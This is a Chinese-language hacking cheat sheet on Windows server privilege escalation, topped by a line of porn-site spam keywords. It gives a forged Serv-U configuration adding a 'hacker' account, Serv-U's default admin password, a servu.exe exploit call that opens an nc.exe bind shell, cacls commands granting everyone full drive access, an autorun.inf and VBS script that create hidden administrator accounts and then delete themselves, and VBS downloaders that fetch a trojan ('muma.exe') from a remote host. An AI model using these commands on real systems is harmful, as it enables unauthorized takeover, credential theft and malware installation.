九色国产,午夜在线视频,新黄色网址,九九色综合,天天做夜夜做久久做狠狠,天天躁夜夜躁狠狠躁2021a,久久不卡一区二区三区

1.常用跳轉(zhuǎn)目錄
C:\Documents and Settings\
C:\Documents and Settings\All Users\
C:\Documents and Settings\All Users\「開始」菜單\程序\
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\
C:\Documents and Settings\All Users\Application Data\ (上傳提升權(quán)限工具的目錄)
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ (pcanywhere的密碼文件CIF)
C:\WINNT\system32\config\ (SAM文件)
C:\WINNT\system32\inetsrv\data\ (上傳提升權(quán)限工具的目錄)
C:\prel\
C:\Temp\
C:\mysql\
C:\PHP\
C:\Program Files\
C:\Program Files\Java Web Start\(jspshell)
C:\Program Files\serv-u\(ServUDaemon.ini)
C:\Program Files\Microsoft SQL Server\
C:\Program Files\KV2004\
C:\Program Files\RISING\RAV\
C:\Program Files\Real\RealServerrar\

2.Serv-u提權(quán)
(1)修改ServUDaemon.ini
[GLOBAL]
Version=6.3.0.0
ProcessID=1312
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0|0
[Domain1]
User1=hacker|1|0
[USER=hacker|1]
Password=qmB04CE1E40C7552C37A52F5CB607EE9A9
HomeDir=c:\
PasswordLastChange=1158674716
TimeOut=600
Access1=c:\|RLP

quote site exec xxx(用來執(zhí)行命令)

(2)端口轉(zhuǎn)發(fā)
43958這個是Serv-U的本地管理端口，用Fpipe把43958端口轉(zhuǎn)發(fā)到其他的端口上去，然后本地連接。添加用戶。
命令：Fpipe.exe -v -l 1234 -r 43958 127.0.0.1
用戶名：LocalAdministrator 密碼：#l@$ak#.lk;0@P

(3)本地權(quán)限提升漏洞
Example: servu.exe "nc.exe -l -p 99 -e cmd.exe"

3.Cacls命令
顯示或者修改文件的訪問控制表(ACL)

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
               [/P user:perm [...]] [/D user [...]]
   filename      顯示 ACL。
   /T            更改當(dāng)前目錄及其所有子目錄中
                 指定文件的 ACL。
   /E            編輯 ACL 而不替換。
   /C            在出現(xiàn)拒絕訪問錯誤時繼續(xù)。
   /G user:perm  賦予指定用戶訪問權(quán)限。
                 Perm 可以是: R  讀取
                              W  寫入
                              C  更改(寫入)
                              F  完全控制
   /R user       撤銷指定用戶的訪問權(quán)限(僅在與 /E 一起使用時合法)。
   /P user:perm  替換指定用戶的訪問權(quán)限。
                 Perm 可以是: N  無
                              R  讀取
                              W  寫入
                              C  更改(寫入)
                              F  完全控制
   /D user       拒絕指定用戶的訪問。
在命令中可以使用通配符指定多個文件。
也可以在命令中指定多個用戶。

縮寫:
   CI - 容器繼承。
        ACE 會由目錄繼承。
   OI - 對象繼承。
        ACE 會由文件繼承。
   IO - 只繼承。
        ACE 不適用于當(dāng)前文件/目錄。
e.g.:
cacls.exe c: /e /t /g everyone:F       #把c盤設(shè)置為everyone可以瀏覽
cacls.exe d: /e /t /g everyone:F       #把d盤設(shè)置為everyone可以瀏覽
cacls.exe e: /e /t /g everyone:F       #把e盤設(shè)置為everyone可以瀏覽
cacls.exe f: /e /t /g everyone:F       #把f盤設(shè)置為everyone可以瀏覽

4.腳本提權(quán)
(1)autorun.inf+shell.vbs
autorun.inf
[autorun]
open=shell.vbs

shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest hacker",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hacker hacker /add",0
wsh.run "net localgroup administrators hacker /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0

(2)scripts.ini+a.bat
scripts.ini
[Startup]
0CmdLine=a.bat
0Parameters=

將文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"

a.bat
net user hacker hacker /add
net localgroup administrators hacker /add

(3)iget.vbs
iLocal = LCase(WScript.Arguments(1)) 
iRemote = LCase(WScript.Arguments(0)) 
Set xPost = createObject("Microsoft.XMLHTTP") 
xPost.Open "GET",iRemote,0 
xPost.Send() 
Set sGet = createObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(xPost.responseBody) 
sGet.SaveToFile iLocal,2 

(4)down.vbs
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://ip-address/muma.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "muma.exe",2

(5)adsutil.vbs提權(quán)
cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps(查看有特權(quán)的dll文件)
cscript C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/inprocessisapiapps "c:\winnt\system32\inetsrv\asp.dll"(將asp.dll加入特權(quán))

1、 idq.dll             d:\winnt\system32\idq.dll
2、 httpext.dll         d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll        d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll           d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll         d:\winnt\system32\msw3prt.dll
6、 author.dll          D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll           D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll           D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll
9、 sspifilt.dll        d:\winnt\system32\inetsrv\sspifilt.dll
10、compfilt.dll        d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll         d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll         d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll        D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll

5.Replace命令
替換文件。

REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W] [/U]

  [drive1:][path1]filename 指定源文件。
  [drive2:][path2]         指定要替換文件的
                           目錄。
  /A                       把新文件加入目標(biāo)目錄。不能和
                           /S 或 /U 命令行開關(guān)搭配使用。
  /P                       替換文件或加入源文件之前會先提示您
                           進(jìn)行確認(rèn)。
  /R                       替換只讀文件以及未受保護(hù)的
                           文件。
  /S                       替換目標(biāo)目錄中所有子目錄的文件。
                           不能與 /A 命令選項
                           搭配使用。
  /W                       等您插入磁盤以后再運行。
  /U                       只會替換或更新比源文件日期早的文件。
                           不能與 /A 命令行開關(guān)搭配使用。